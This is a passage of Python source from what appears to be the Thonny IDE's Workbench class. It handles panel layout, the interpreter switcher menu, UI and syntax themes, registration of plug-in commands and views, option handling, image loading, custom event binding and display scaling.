self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
margin = 10
# Main frame functions as
        # - a background behind the padding of main_pw; without this OS X leaves a white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1
self._center_pw.insert("auto", self._editor_notebook)
self._statusbar = ttk.Frame(main_frame)
self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
self._statusbar.columnconfigure(2, weight=2)
self._status_label = ttk.Label(self._statusbar, text="")
self._status_label.grid(row=1, column=1, sticky="w")
self._init_backend_switcher()
def _init_backend_switcher(self):
# Set up the menu
self._backend_conf_variable = tk.StringVar(value="{}")
self._backend_menu = tk.Menu(self._statusbar, tearoff=False)
# Set up the button
self._backend_button = ttk.Button(self._statusbar, text="", style="Toolbutton")
self._backend_button.grid(row=1, column=3, sticky="e")
self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
menu_font = tk_font.nametofont("TkMenuFont")
def choose_backend():
backend_conf = ast.literal_eval(self._backend_conf_variable.get())
assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
for name, value in backend_conf.items():
self.set_option(name, value)
get_runner().restart_backend(False)
self._backend_menu.delete(0, "end")
max_description_width = 0
button_text_width = menu_font.measure(self._backend_button.cget("text"))
num_entries = 0
for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
entries = backend.proxy_class.get_switcher_entries()
if not entries:
continue
if len(entries) == 1:
self._backend_menu.add_radiobutton(
label=backend.description,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(entries[0][0]),
)
else:
submenu = tk.Menu(self._backend_menu, tearoff=False)
for conf, label in entries:
submenu.add_radiobutton(
label=label,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(conf),
)
self._backend_menu.add_cascade(label=backend.description, menu=submenu)
max_description_width = max(
menu_font.measure(backend.description), max_description_width
)
num_entries += 1
# self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
self._backend_menu.add_separator()
self._backend_menu.add_command(
label=tr("Configure interpreter..."),
command=lambda: self.show_options("interpreter"),
)
post_x = self._backend_button.winfo_rootx()
post_y = self._backend_button.winfo_rooty()
if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
# Most likely several monitors.
# Tk will adjust x properly with single monitor, but when Thonny is maximized
# on a monitor, which has another monitor to its right, the menu can be partially
# displayed on another monitor (at least in Ubuntu).
width_diff = max_description_width - button_text_width
post_x -= width_diff + menu_font.measure("mmm")
if running_on_mac_os():
# won't be good location otherwise
popup_entry = num_entries + 4
else:
popup_entry = ""
# print(post_x, post_y)
try:
self._backend_menu.tk_popup(post_x, post_y, entry=popup_entry)
except tk.TclError as e:
            if 'unknown option "-state"' not in str(e):
logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
proxy = get_runner().get_backend_proxy()
if proxy:
desc = proxy.get_clean_description()
self._backend_conf_variable.set(value=repr(proxy.get_current_switcher_configuration()))
else:
backend_conf = self._backends.get(self.get_option("run.backend_name"), None)
if backend_conf:
desc = backend_conf.description
else:
desc = "<no backend>"
self._backend_button.configure(text=desc)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
                If a menu with the given name doesn't exist, then a new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
                Groups with smaller numbers appear first.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
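    # Illustrative usage only (not part of Workbench): a plug-in's load_plugin() would
    # typically register a command roughly like this, using the documented arguments above.
    # The command id, label, handler and shortcut are hypothetical.
    #
    #   def load_plugin():
    #       workbench = thonny.get_workbench()
    #       workbench.add_command(
    #           command_id="example_hello",
    #           menu_name="tools",
    #           command_label="Say hello",
    #           handler=lambda: print("hello"),
    #           default_sequence="<Control-Alt-h>",
    #           group=150,
    #       )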
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
                # I don't like that Tk menu toggles checkbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
                # no image or blank next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
            cls: Class or constructor for the view. Should be callable with a single
argument (the master of the view)
label: Label of the view tab
            default_location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
        if default_position_key is None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
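    # Illustrative usage only (hypothetical view class and label): a plug-in registers a
    # panel with add_view and it then shows up under the View menu in the given location.
    #
    #   class ExampleView(ttk.Frame): ...
    #   get_workbench().add_view(ExampleView, tr("Example"), "se", visible_by_default=False)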
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
        # assign names to related classes
proxy_class.backend_name = name # type: ignore
proxy_class.backend_description = description # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
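    # Illustrative usage only (hypothetical theme name, assumed parent and colors):
    # a syntax theme is a plain nested dict mapping token tags to Tk text options,
    # optionally inheriting from a previously registered parent theme.
    #
    #   get_workbench().add_syntax_theme(
    #       "Example dark colors",
    #       "Default Dark",  # assumed to be registered by a built-in plug-in
    #       {"comment": {"foreground": "#77aa77"},
    #        "keyword": {"foreground": "#ffcc66", "font": "BoldEditorFont"}},
    #   )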
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
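    # E.g. with an assumed _scaling_factor of 1.67: scale(1) == 1 (thin lines are kept at
    # one pixel) and scale(10) == 16, because int() truncates instead of rounding.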
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
        If the name contains a period, then the part left of the (first) period
        becomes the section of the option and the rest becomes the name under that
        section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
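    # For example (hypothetical option names): set_default("myplugin.show_hints", True)
    # registers the option under section "myplugin", while set_default("show_hints", True)
    # would register it under section "general", as described above.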
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
            name: meant to be used as a non-translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
# For compatibility with plug-ins
if name in ["device", "tempdevice"] and label is None:
label = tr("Device")
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
        # initially the view will be in its home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
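    # Illustrative usage only: names that don't start with "<" go through the custom
    # registry above rather than Tk's bind; "ExampleEvent", the handler and the payload
    # attribute are hypothetical.
    #
    #   def on_example(event):
    #       print(event.sequence, event.payload)
    #
    #   get_workbench().bind("ExampleEvent", on_example, True)
    #   get_workbench().event_generate("ExampleEvent", payload=42)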
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return (
os.environ.get("THONNY_DEBUG", False)
in [
"1",
1,
"True",
True,
"true",
]
or self.get_option("general.debug_mode", False)
)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
                # According to the documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
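# Worked example of the Linux branch above (the numbers are illustrative
# assumptions): with _default_scaling_factor == 1.33 and "general.scaling"
# set to 2.0, a system font reported with size -13 (i.e. 13 px) is first
# converted to 13 / 1.33 ≈ 9.8 pt, then multiplied by 2.0 / 1.33 ≈ 1.5 and
# rounded, so f.configure(size=15) is applied.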
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may not be created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
